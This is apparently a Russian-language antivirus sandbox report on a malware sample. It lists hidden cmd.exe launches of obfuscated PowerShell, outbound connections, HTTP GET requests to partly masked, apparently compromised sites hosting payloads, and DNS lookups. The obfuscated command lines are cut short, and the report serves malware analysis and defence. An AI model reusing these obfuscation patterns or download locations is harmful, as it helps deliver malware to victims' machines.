Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\CMd.exE /C "seT fhc=sV jq9Ih ( [CHAR[] ]"))63]rAHC[,)68]rAHC[+801]rAHC[+37]rAHC[(EcAlper-421]rAHC[,'8IU' ECALPeRc-93]rAHC[,)25]rAHC[+911]rAHC[+101]rAHC[( ECALPeRc- )')4we...
Сетевая активность
Подключается к
- 'bl##puma.at':80
- 'bl##puma.at':443
- 'cr#####estudio-spb.ru':80
- 'sp##.co.in':80
- 'sp##.co.in':443
- 'ce######ates.godaddy.com':80
- 'se#######aextension.unt.edu.ar':80
TCP
Запросы HTTP GET
- http://www.bl##puma.at/97Hf4F
- http://cr#####estudio-spb.ru/KlX5
- http://www.sp##.co.in/KsEg
- http://www.sp##.co.in/sphm
- http://www.sp##.co.in/sphm/
- http://ce######ates.godaddy.com/repository/gdig2.crt
- http://www.se#######aextension.unt.edu.ar/wp-content/XK1uBZL
Другие
- 'bl##puma.at':443
- 'sp##.co.in':443
UDP
- DNS ASK bl##puma.at
- DNS ASK na###lsadi.com
- DNS ASK cr#####estudio-spb.ru
- DNS ASK sp##.co.in
- DNS ASK ce######ates.godaddy.com
- DNS ASK se#######aextension.unt.edu.ar
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\CMd.exE /C "seT fhc=sV jq9Ih ( [CHAR[] ]"))63]rAHC[,)68]rAHC[+801]rAHC[+37]rAHC[(EcAlper-421]rAHC[,'8IU' ECALPeRc-93]rAHC[,)25]rAHC[+911]rAHC[+101]rAHC[( ECALPeRc- )')4we...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "seT fhc=sV jq9Ih ( [CHAR[] ]"))63]rAHC[,)68]rAHC[+801]rAHC[+37]rAHC[(EcAlper-421]rAHC[,'8IU' ECALPeRc-93]rAHC[,)25]rAHC[+911]rAHC[+101]rAHC[( ECALPeRc- )')4we4wenI'+'Oj-]52,'+'42,4'+...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' SeT-iTEM (\"v\" + \"ARiablE\" + \":5Pv\" ) ( [typE]( \"{3}{0}{2}{1}\" -f'NVi','ONmeNt','r','E' ) ) ; ( & ( \"{1}{2}{0}\"-f'e','variA','Bl' ) ( \"{1}{0}\" -f '*Xt','Ex') -vAlUEONLY ...
